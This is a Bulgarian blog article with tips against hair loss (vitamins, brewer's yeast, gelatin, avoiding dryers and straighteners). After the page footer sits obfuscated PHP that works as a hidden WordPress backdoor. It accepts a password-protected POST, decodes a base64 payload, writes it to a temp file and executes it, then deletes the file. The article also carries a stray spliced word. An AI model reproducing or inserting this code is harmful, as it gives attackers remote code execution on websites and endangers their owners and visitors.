Лесни съвети срещу косопад | Косопад

Лесни съвети срещу косопад

Косопадът може да причинен от стрес, нерви, тревожност или лошо хранене, което пречи на обновяването на корените. Сред основните средства за борба с косопада са домашните рецепти, шампоани, витамини и др.

Трябва обаче да имаме предвид и грижите, които полагаме за косата си. Преси, сешоари и стегнати прически ускоряват един процес, който по принцип е естествен, но може да стане истински кошмар, ако косопадът е обилен.

съвети

Здравето на косата зависи, до голяма степен, от храненето ни. Нуждае се особено много от витамин В5 и Н (зърнени храни, бобови храни, бирена мая). Също витамините А и В са важни. Затова, ако не се храните пълноценно и здравословно, няма как да имате красива коса.

Ако не можете да приемате достатъчно витамини с храната, си купете на таблетки. Може да засилите ефекта им с чаша вода и лъжица бирена мая вътре. Бирената мая няма приятен вкус, но ще се отрази чудесно на косата ви.

Ако това не може да се впише в ежедневието ви, можете да го заместите с редовен прием на желатин, който е много полезен сешоарза кръвоносните съдове.

Ако е възможно, не използвайте сешоар. Най- добрият начин за сушене е естественият. Ако ви се налага да използвате сешоар, го дръжте по- далече от косата ви.

Употребата на преса обаче е още по- зле и от сешоара, независимо дали са от метал, керамика или др. Каквото и да казват производителите, високата температура, с която третирате косата ви, я прави чуплива и слаба.

14. декември 2013 17:03:39 от Надя Колева
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}